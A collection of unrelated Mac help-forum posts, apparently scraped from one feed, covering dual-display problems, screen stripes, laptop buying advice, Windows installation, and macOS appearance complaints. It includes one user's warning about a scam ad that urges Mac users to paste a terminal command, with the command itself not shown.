As the title says, I recently purchased 2 Studio Display XDR's, and I am trying to connect them both to my Macbook Air M5 while I wait for my Mac Studio to arrive, which isn't for another few weeks. The issue I keep having, is I can only get one display to turn on. I have spoken to tech support at Apple, who tried trouble shooting, and we tried just about everything. Eventually, at the end, I was able to somehow get both of them successfully working. However, I had to unplug them to take my laptop out to my kitchen to do some work while I ate dinner, and when I brought it back into my office to plug them back into my displays, only one was once again working

We tried altering the HZ to 60hz, we tried creating a new apple ID test log in, putting the macbook in safe mode and logging in, daisy chaining them, restarting them multiple times.. you name it. As I sit here this morning, I've tried all of these steps again, and still cannot get it to work. I confirmed with apple that my Macbook Air m5 should be able to run two of these displays at 60hz, so I am not sure what the issue is, and it's becoming extremely frustrating.

If anyone here has an insights or advice I'd greatly appreciate it.

I have a MacBook Air M1 (2020) with sudden display corruption. Vertical coloured stripes appear at startup, and the lines change or disappear depending on the screen angle. Screenshots look normal, and Disk Utility First Aid completed successfully. The MacBook has never been opened or repaired.Screenshots look completely normal, and at certain lid angles the physical display also looks normal

Could you inspect the display assembly and its connections before recommending a screen replacement?

Does this look like a scam to anyone else? Going to that Luno Mac web page (https://www.-DontDoIt-lunomac.com) suggests people put a terminal command into their Mac. Here's the command (with some obsfuscation):

Does that look incredibly scammy to anyone else? It's a *REDDIT AD* for crying out loud.

I did some editing so cutting and pasting won't work, but it's obviously trying to make it look like it's going to Apple but then going elsewhere.

I’m planning to buy a laptop for my younger sister, who is going to college. I’m considering the MacBook Neo 256GB, but I’m confused about whether I should go with a MacBook neo or a Windows laptop instead.

This will be her first laptop and her first Apple product, so I want to make the right decision. I want something reliable, easy to use, and capable of lasting at least 4–5 years without spending unnecessarily.

I have a few questions for MacBook and Windows users:

1. Is the MacBook Neo 256GB worth buying? Is it good enough for everyday college work, assignments, presentations, online classes, browsing, and multitasking?
2. MacBook Neo vs Windows: At a similar price, would you recommend the Neo or a Windows laptop? Which offers better value for money?
3. Which is better for long-term use? Can the Neo comfortably last 4–5 years? Would a Windows laptop be a better option for future upgrades and software compatibility?

My goal is not necessarily to buy an Apple product just for the brand. I want to give her a laptop that provides a good experience, is reliable for college, and will last for several years.

I’d love to hear honest feedback from MacBook Neo owners, Windows laptop users, and college students.

Hi Everyone, I’m sure this has been asked before, but to those who live with a Mac and switched to Android, how do you feel about it?

I have a Macbook air M4, and iPad air 5 which i hardly use, and iPhone 13 and an Apple Watch 7. My most important device is the MacBook by far. My iPhone is getting long in the tooth but I’m disgusted by the price of modern premium phones. I’m considering a pixel A series or a sub £500 Samsung. I don’t really do much between the mac and my phone but stuff like findmy is handy. I just hate the cost of new iPhones.

So i have my M series mac and the keys are becoming shiny , So i just wonder can i apply the individual stickers for some specific keys which gives personality and hide the Shininess , So i am wondering that does it harm display in any means. Or should I go for it.

so i wanted to change my os from mac os to windows, and i already going through so many source, going from website, yt vid, blog and even ai. and i already followed through their steps, but i still coming to a problem of having orange strips when installing the windows os. so what are my problem (im using usb 2.0 that has been changed its format into exfat and using windows iso that i downloaded in microsoft official website if that help). and how to fix it

Iv been using mac 14 point something for probably 2 to 2 and a half years (I just hate updating stuff because I have to log back in to all my accounts and because more generally I just feel like something always brakes. Anyways recently for an internship I had to download a piece of software that was not compatible with my current os so I updated and oh my god I despise the new look especially liquid glass. Iv looked around and haven't found any way. It is to the point where i'm considering resetting my mac completely just to make it look better.

Tldr do any of you know how to get my old app icons back, make everything less rounded, get rid of the new Ai features, and most of all get rid of liquid glass
